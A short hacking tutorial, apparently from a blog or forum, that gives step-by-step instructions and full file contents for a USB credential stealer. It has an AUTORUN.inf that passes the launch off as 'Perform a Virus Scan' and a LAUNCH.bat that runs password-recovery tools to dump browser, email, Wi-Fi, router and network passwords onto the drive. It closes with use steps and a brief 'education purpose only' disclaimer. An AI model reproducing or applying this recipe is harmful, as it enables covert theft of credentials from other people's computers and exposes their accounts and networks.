How to steal passwords of a computer with USB in just seconds ??
How to make stealer ??
Step 1: open notepad and Create a new file.
Type or copy/paste Text below:-
ACTION= Perform a Virus Scan
Save this as AUTORUN.inf (NOTE: extension must be .inf not .txt)
Step 2: Now again open Notepad and Create a new file.
Type or copy/paste Text below…
start mspass.exe /stext pass/mspass.txt
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt
Save this as LAUNCH.bat
Now you have 2 files…
Step 3: Copy the autorun and launch file to your USB…
Step 4: click here --> TeChNoSoFt i7 <-- And download the programs named in Step 2
Step 5: Then copy them with your other files that is autorun and launch.bat files
How to use ??
- Now copy our ready made pass stealer files or your setup files to your usb drive.
- Now re-plug USB.
- Choose Perform A Virus scan Option, on auto-run menu.
- Era..!!! All Pass r steal and in pass folder.
- You can run launch.bat file direct and steal pass.
NOTE : These File are may be deleted by antivirus. So be care-full.
NOTE : Hacking passwords and id is under crime. you will get caught by police if you do that. I am sharing knowledge for education purpose only. Its Not my responsibility if you caught bye hacking